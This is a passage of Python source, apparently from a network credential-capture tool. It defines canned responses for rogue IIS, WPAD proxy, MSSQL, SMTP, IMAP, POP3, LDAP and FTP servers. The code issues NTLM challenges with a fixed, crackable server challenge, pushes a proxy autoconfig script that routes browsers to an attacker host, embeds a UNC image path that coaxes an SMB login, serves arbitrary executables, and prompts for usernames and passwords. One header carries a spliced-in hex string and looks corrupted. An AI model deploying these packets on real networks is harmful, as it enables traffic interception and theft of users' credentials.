CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
# Target Name Offsets
self.fields["TargetNameOffset"] = struct.pack("<i", len(CalculateNameOffset))
self.fields["TargetNameLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
self.fields["TargetNameMaxLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
# AvPairs Offsets
self.fields["TargetInfoOffset"] = struct.pack("<i", len(CalculateAvPairsOffset))
self.fields["TargetInfoLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
self.fields["TargetInfoMaxLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
# AvPairs StrLen
self.fields["Av1Len"] = struct.pack("<i", len(str(self.fields["Av1Str"])))[:2]
self.fields["Av2Len"] = struct.pack("<i", len(str(self.fields["Av2Str"])))[:2]
self.fields["Av3Len"] = struct.pack("<i", len(str(self.fields["Av3Str"])))[:2]
self.fields["Av4Len"] = struct.pack("<i", len(str(self.fields["Av4Str"])))[:2]
self.fields["Av5Len"] = struct.pack("<i", len(str(self.fields["Av5Str"])))[:2]
class IIS_Auth_401_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
])
class IIS_Auth_Granted(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
("Payload", "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class IIS_NTLM_Challenge_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWWAuth", "WWW-Authenticate: NTLM "),
("Payload", ""),
("Payload-CRLF", "\r\n"),
("PoweredBy", "X-Powered-By: ASP.NC0CD7B7802C76736E9B26FB19BEB2D36290B9FF9A46EDDA5ET\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
])
def calculate(self,payload):
self.fields["Payload"] = b64encode(payload)
class IIS_Basic_401_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"),
("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
])
##### Proxy mode Packets #####
class WPADScript(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ServerTlype", "Server: Microsoft-IIS/6.0\r\n"),
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
("Payload", "function FindProxyForURL(url, host){return 'PROXY wpadwpadwpad:3141; DIRECT';}"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class ServeExeFile(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ContentType", "Content-Type: application/octet-stream\r\n"),
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentDisp", "Content-Disposition: attachment; filename="),
("ContentDiFile", ""),
("FileCRLF", ";\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
("Connection", "Connection: keep-alive\r\n"),
("X-CCC", "US\r\n"),
("X-CID", "2\r\n"),
("CRLF", "\r\n"),
("Payload", "jj"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class ServeHtmlFile(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ContentType", "Content-Type: text/html\r\n"),
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
("Connection", "Connection: keep-alive\r\n"),
("CRLF", "\r\n"),
("Payload", "jj"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
##### FTP Packets #####
class FTPPacket(Packet):
fields = OrderedDict([
("Code", "220"),
("Separator", "\x20"),
("Message", "Welcome"),
("Terminator", "\x0d\x0a"),
])
##### SQL Packets #####
class MSSQLPreLoginAnswer(Packet):
fields = OrderedDict([
("PacketType", "\x04"),
("Status", "\x01"),
("Len", "\x00\x25"),
("SPID", "\x00\x00"),
("PacketID", "\x01"),
("Window", "\x00"),
("TokenType", "\x00"),
("VersionOffset", "\x00\x15"),
("VersionLen", "\x00\x06"),
("TokenType1", "\x01"),
("EncryptionOffset", "\x00\x1b"),
("EncryptionLen", "\x00\x01"),
("TokenType2", "\x02"),
("InstOptOffset", "\x00\x1c"),
("InstOptLen", "\x00\x01"),
("TokenTypeThrdID", "\x03"),
("ThrdIDOffset", "\x00\x1d"),
("ThrdIDLen", "\x00\x00"),
("ThrdIDTerminator", "\xff"),
("VersionStr", "\x09\x00\x0f\xc3"),
("SubBuild", "\x00\x00"),
("EncryptionStr", "\x02"),
("InstOptStr", "\x00"),
])
def calculate(self):
CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])+str(self.fields["EncryptionStr"])+str(self.fields["InstOptStr"])
VersionOffset = str(self.fields["TokenType"])+str(self.fields["VersionOffset"])+str(self.fields["VersionLen"])+str(self.fields["TokenType1"])+str(self.fields["EncryptionOffset"])+str(self.fields["EncryptionLen"])+str(self.fields["TokenType2"])+str(self.fields["InstOptOffset"])+str(self.fields["InstOptLen"])+str(self.fields["TokenTypeThrdID"])+str(self.fields["ThrdIDOffset"])+str(self.fields["ThrdIDLen"])+str(self.fields["ThrdIDTerminator"])
EncryptionOffset = VersionOffset+str(self.fields["VersionStr"])+str(self.fields["SubBuild"])
InstOpOffset = EncryptionOffset+str(self.fields["EncryptionStr"])
ThrdIDOffset = InstOpOffset+str(self.fields["InstOptStr"])
self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket))
#Version
self.fields["VersionLen"] = struct.pack(">h",len(self.fields["VersionStr"]+self.fields["SubBuild"]))
self.fields["VersionOffset"] = struct.pack(">h",len(VersionOffset))
#Encryption
self.fields["EncryptionLen"] = struct.pack(">h",len(self.fields["EncryptionStr"]))
self.fields["EncryptionOffset"] = struct.pack(">h",len(EncryptionOffset))
#InstOpt
self.fields["InstOptLen"] = struct.pack(">h",len(self.fields["InstOptStr"]))
self.fields["EncryptionOffset"] = struct.pack(">h",len(InstOpOffset))
#ThrdIDOffset
self.fields["ThrdIDOffset"] = struct.pack(">h",len(ThrdIDOffset))
class MSSQLNTLMChallengeAnswer(Packet):
fields = OrderedDict([
("PacketType", "\x04"),
("Status", "\x01"),
("Len", "\x00\xc7"),
("SPID", "\x00\x00"),
("PacketID", "\x01"),
("Window", "\x00"),
("TokenType", "\xed"),
("SSPIBuffLen", "\xbc\x00"),
("Signature", "NTLMSSP"),
("SignatureNull", "\x00"),
("MessageType", "\x02\x00\x00\x00"),
("TargetNameLen", "\x06\x00"),
("TargetNameMaxLen", "\x06\x00"),
("TargetNameOffset", "\x38\x00\x00\x00"),
("NegoFlags", "\x05\x02\x89\xa2"),
("ServerChallenge", ""),
("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("TargetInfoLen", "\x7e\x00"),
("TargetInfoMaxLen", "\x7e\x00"),
("TargetInfoOffset", "\x3e\x00\x00\x00"),
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
("TargetNameStr", "SMB"),
("Av1", "\x02\x00"),#nbt name
("Av1Len", "\x06\x00"),
("Av1Str", "SMB"),
("Av2", "\x01\x00"),#Server name
("Av2Len", "\x14\x00"),
("Av2Str", "SMB-TOOLKIT"),
("Av3", "\x04\x00"),#Full Domain name
("Av3Len", "\x12\x00"),
("Av3Str", "smb.local"),
("Av4", "\x03\x00"),#Full machine domain name
("Av4Len", "\x28\x00"),
("Av4Str", "server2003.smb.local"),
("Av5", "\x05\x00"),#Domain Forest Name
("Av5Len", "\x12\x00"),
("Av5Str", "smb.local"),
("Av6", "\x00\x00"),#AvPairs Terminator
("Av6Len", "\x00\x00"),
])
def calculate(self):
# First convert to unicode
self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le')
self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
# Then calculate
CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["SSPIBuffLen"])+str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
CalculateSSPI = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket))
self.fields["SSPIBuffLen"] = struct.pack("<i",len(CalculateSSPI))[:2]
# Target Name Offsets
self.fields["TargetNameOffset"] = struct.pack("<i", len(CalculateNameOffset))
self.fields["TargetNameLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
self.fields["TargetNameMaxLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
# AvPairs Offsets
self.fields["TargetInfoOffset"] = struct.pack("<i", len(CalculateAvPairsOffset))
self.fields["TargetInfoLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
self.fields["TargetInfoMaxLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
# AvPairs StrLen
self.fields["Av1Len"] = struct.pack("<i", len(str(self.fields["Av1Str"])))[:2]
self.fields["Av2Len"] = struct.pack("<i", len(str(self.fields["Av2Str"])))[:2]
self.fields["Av3Len"] = struct.pack("<i", len(str(self.fields["Av3Str"])))[:2]
self.fields["Av4Len"] = struct.pack("<i", len(str(self.fields["Av4Str"])))[:2]
self.fields["Av5Len"] = struct.pack("<i", len(str(self.fields["Av5Str"])))[:2]
##### SMTP Packets #####
class SMTPGreeting(Packet):
    """Initial SMTP banner sent on client connect: "220 smtp01.local ESMTP"."""
    fields = OrderedDict([
        ("Code", "220"),  # service-ready reply code
        ("Separator", "\x20"),
        ("Message", "smtp01.local ESMTP"),
        ("CRLF", "\x0d\x0a"),
    ])
class SMTPAUTH(Packet):
    """EHLO reply: a 250- continuation line with the host name, then the
    final 250 line advertising the AUTH mechanisms offered to the client."""
    fields = OrderedDict([
        ("Code0", "250"),
        ("Separator0", "\x2d"),  # '-' marks a multi-line reply continuation
        ("Message0", "smtp01.local"),
        ("CRLF0", "\x0d\x0a"),
        ("Code", "250"),
        ("Separator", "\x20"),  # ' ' marks the final line of the reply
        ("Message", "AUTH LOGIN PLAIN XYMCOOKIE"),
        ("CRLF", "\x0d\x0a"),
    ])
class SMTPAUTH1(Packet):
    """334 challenge prompting for the user name.

    "VXNlcm5hbWU6" is base64 for "Username:".
    """
    fields = OrderedDict([
        ("Code", "334"),
        ("Separator", "\x20"),
        ("Message", "VXNlcm5hbWU6"),#Username
        ("CRLF", "\x0d\x0a"),
    ])
class SMTPAUTH2(Packet):
    """334 challenge prompting for the password.

    "UGFzc3dvcmQ6" is base64 for "Password:".
    """
    fields = OrderedDict([
        ("Code", "334"),
        ("Separator", "\x20"),
        ("Message", "UGFzc3dvcmQ6"),#Password
        ("CRLF", "\x0d\x0a"),
    ])
##### IMAP Packets #####
class IMAPGreeting(Packet):
    """Untagged OK banner sent when an IMAP client connects."""
    fields = OrderedDict([
        ("Code", "* OK IMAP4 service is ready."),
        ("CRLF", "\r\n"),
    ])
class IMAPCapability(Packet):
    """Untagged CAPABILITY reply advertising only AUTH=PLAIN."""
    fields = OrderedDict([
        ("Code", "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"),
        ("CRLF", "\r\n"),
    ])
class IMAPCapabilityEnd(Packet):
    """Tagged completion line for the CAPABILITY command."""
    fields = OrderedDict([
        # Empty by default; presumably set to the client's command tag by
        # the caller before sending -- TODO confirm against call sites.
        ("Tag", ""),
        ("Message", " OK CAPABILITY completed."),
        ("CRLF", "\r\n"),
    ])
##### POP3 Packets #####
class POPOKPacket(Packet):
    """Generic POP3 positive response ("+OK")."""
    fields = OrderedDict([
        ("Code", "+OK"),
        ("CRLF", "\r\n"),
    ])
##### LDAP Packets #####
class LDAPSearchDefaultPacket(Packet):
    """Minimal BER-encoded LDAP searchResDone reply (success, no entries)."""
    fields = OrderedDict([
        ("ParserHeadASNID", "\x30"),  # ASN.1 SEQUENCE tag
        ("ParserHeadASNLen", "\x0c"),
        ("MessageIDASNID", "\x02"),  # ASN.1 INTEGER tag
        ("MessageIDASNLen", "\x01"),
        ("MessageIDASNStr", "\x0f"),
        ("OpHeadASNID", "\x65"),  # LDAP searchResDone [APPLICATION 5]
        ("OpHeadASNIDLen", "\x07"),
        ("SearchDoneSuccess", "\x0A\x01\x00\x04\x00\x04\x00"),#No Results.
    ])
class LDAPSearchSupportedCapabilitiesPacket(Packet):
    """Canned LDAP searchResEntry advertising three Active Directory
    ``supportedCapabilities`` OIDs, followed by a searchResDone (success).

    All BER lengths are pre-computed constants (see the trailing decimal
    comments); nothing is recalculated at send time.
    """
    fields = OrderedDict([
        ("ParserHeadASNID", "\x30"),
        ("ParserHeadASNLenOfLen", "\x84"),  # long-form length: 4 length octets follow
        ("ParserHeadASNLen", "\x00\x00\x00\x7e"),#126
        ("MessageIDASNID", "\x02"),
        ("MessageIDASNLen", "\x01"),
        ("MessageIDASNStr", "\x02"),
        ("OpHeadASNID", "\x64"),  # searchResEntry [APPLICATION 4]
        ("OpHeadASNIDLenOfLen", "\x84"),
        ("OpHeadASNIDLen", "\x00\x00\x00\x75"),#117
        ("ObjectName", "\x04\x00"),
        ("SearchAttribASNID", "\x30"),
        ("SearchAttribASNLenOfLen", "\x84"),
        ("SearchAttribASNLen", "\x00\x00\x00\x6d"),#109
        ("SearchAttribASNID1", "\x30"),
        ("SearchAttribASN1LenOfLen", "\x84"),
        ("SearchAttribASN1Len", "\x00\x00\x00\x67"),#103
        ("SearchAttribASN2ID", "\x04"),
        ("SearchAttribASN2Len", "\x15"),#21
        ("SearchAttribASN2Str", "supportedCapabilities"),
        ("SearchAttribASN3ID", "\x31"),
        ("SearchAttribASN3LenOfLen", "\x84"),
        ("SearchAttribASN3Len", "\x00\x00\x00\x4a"),
        ("SearchAttrib1ASNID", "\x04"),
        ("SearchAttrib1ASNLen", "\x16"),#22
        ("SearchAttrib1ASNStr", "1.2.840.113556.1.4.800"),
        ("SearchAttrib2ASNID", "\x04"),
        ("SearchAttrib2ASNLen", "\x17"),#23
        ("SearchAttrib2ASNStr", "1.2.840.113556.1.4.1670"),
        ("SearchAttrib3ASNID", "\x04"),
        ("SearchAttrib3ASNLen", "\x17"),#23
        ("SearchAttrib3ASNStr", "1.2.840.113556.1.4.1791"),
        ("SearchDoneASNID", "\x30"),
        ("SearchDoneASNLenOfLen", "\x84"),
        ("SearchDoneASNLen", "\x00\x00\x00\x10"),#16
        ("MessageIDASN2ID", "\x02"),
        ("MessageIDASN2Len", "\x01"),
        ("MessageIDASN2Str", "\x02"),
        ("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
        ## No need to calculate anything this time, this packet is generic.
    ])
class LDAPSearchSupportedMechanismsPacket(Packet):
    """Canned LDAP searchResEntry listing ``supportedSASLMechanisms``
    (GSSAPI, GSS-SPNEGO, EXTERNAL, DIGEST-MD5), then searchResDone.

    All BER lengths are pre-computed constants (see the trailing decimal
    comments); nothing is recalculated at send time.
    """
    fields = OrderedDict([
        ("ParserHeadASNID", "\x30"),
        ("ParserHeadASNLenOfLen", "\x84"),  # long-form length: 4 length octets follow
        ("ParserHeadASNLen", "\x00\x00\x00\x60"),#96
        ("MessageIDASNID", "\x02"),
        ("MessageIDASNLen", "\x01"),
        ("MessageIDASNStr", "\x02"),
        ("OpHeadASNID", "\x64"),  # searchResEntry [APPLICATION 4]
        ("OpHeadASNIDLenOfLen", "\x84"),
        ("OpHeadASNIDLen", "\x00\x00\x00\x57"),#87
        ("ObjectName", "\x04\x00"),
        ("SearchAttribASNID", "\x30"),
        ("SearchAttribASNLenOfLen", "\x84"),
        ("SearchAttribASNLen", "\x00\x00\x00\x4f"),#79
        ("SearchAttribASNID1", "\x30"),
        ("SearchAttribASN1LenOfLen", "\x84"),
        ("SearchAttribASN1Len", "\x00\x00\x00\x49"),#73
        ("SearchAttribASN2ID", "\x04"),
        ("SearchAttribASN2Len", "\x17"),#23
        ("SearchAttribASN2Str", "supportedSASLMechanisms"),
        ("SearchAttribASN3ID", "\x31"),
        ("SearchAttribASN3LenOfLen", "\x84"),
        ("SearchAttribASN3Len", "\x00\x00\x00\x2a"),#42
        ("SearchAttrib1ASNID", "\x04"),
        ("SearchAttrib1ASNLen", "\x06"),#6
        ("SearchAttrib1ASNStr", "GSSAPI"),
        ("SearchAttrib2ASNID", "\x04"),
        ("SearchAttrib2ASNLen", "\x0a"),#10
        ("SearchAttrib2ASNStr", "GSS-SPNEGO"),
        ("SearchAttrib3ASNID", "\x04"),
        ("SearchAttrib3ASNLen", "\x08"),#8
        ("SearchAttrib3ASNStr", "EXTERNAL"),
        ("SearchAttrib4ASNID", "\x04"),
        ("SearchAttrib4ASNLen", "\x0a"),#10
        ("SearchAttrib4ASNStr", "DIGEST-MD5"),
        ("SearchDoneASNID", "\x30"),
        ("SearchDoneASNLenOfLen", "\x84"),
        ("SearchDoneASNLen", "\x00\x00\x00\x10"),#16
        ("MessageIDASN2ID", "\x02"),
        ("MessageIDASN2Len", "\x01"),
        ("MessageIDASN2Str", "\x02"),
        ("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
        ## No need to calculate anything this time, this packet is generic.
    ])
class LDAPNTLMChallenge(Packet):
    """LDAP bindResponse (saslBindInProgress) carrying an NTLMSSP
    CHALLENGE message with a fixed server challenge and canned AV pairs.

    ``calculate`` rewrites every length/offset field from the actual field
    contents, so the constants in ``fields`` are only placeholders.
    """
    fields = OrderedDict([
        ("ParserHeadASNID", "\x30"),
        ("ParserHeadASNLenOfLen", "\x84"),
        ("ParserHeadASNLen", "\x00\x00\x00\xD0"),#208
        ("MessageIDASNID", "\x02"),
        ("MessageIDASNLen", "\x01"),
        ("MessageIDASNStr", "\x02"),
        ("OpHeadASNID", "\x61"),  # bindResponse [APPLICATION 1]
        ("OpHeadASNIDLenOfLen", "\x84"),
        ("OpHeadASNIDLen", "\x00\x00\x00\xc7"),#199
        ("Status", "\x0A"),
        ("StatusASNLen", "\x01"),
        ("StatusASNStr", "\x0e"), #In Progress.
        ("MatchedDN", "\x04\x00"), #Null
        ("ErrorMessage", "\x04\x00"), #Null
        ("SequenceHeader", "\x87"),
        ("SequenceHeaderLenOfLen", "\x81"),
        ("SequenceHeaderLen", "\x82"), #188
        ("NTLMSSPSignature", "NTLMSSP"),
        ("NTLMSSPSignatureNull", "\x00"),
        ("NTLMSSPMessageType", "\x02\x00\x00\x00"),  # NTLM CHALLENGE
        ("NTLMSSPNtWorkstationLen", "\x1e\x00"),
        ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"),
        ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"),
        ("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"),
        # Static 8-byte server challenge (makes captured responses crackable
        # against a known challenge).
        ("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"),
        ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("NTLMSSPNtTargetInfoLen", "\x94\x00"),
        ("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"),
        ("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"),
        ("NegTokenInitSeqMechMessageVersionHigh", "\x05"),
        ("NegTokenInitSeqMechMessageVersionLow", "\x02"),
        ("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"),
        ("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
        ("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
        ("NTLMSSPNtWorkstationName", "SMB12"),
        ("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"),
        ("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"),
        ("NTLMSSPNTLMChallengeAVPairsUnicodeStr", "smb12"),
        ("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"),
        ("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"),
        ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", "SERVER2008"),
        ("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"),
        ("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"),
        ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", "smb12.local"),
        ("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"),
        ("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"),
        ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", "SERVER2008.smb12.local"),
        ("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"),
        ("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"),
        ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", "smb12.local"),
        ("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"),  # MsvAvEOL terminator
        ("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"),
    ])
    def calculate(self):
        ###### Convert strings to Unicode first
        self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
        self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
        self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
        self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
        self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
        self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
        ###### Workstation Offset
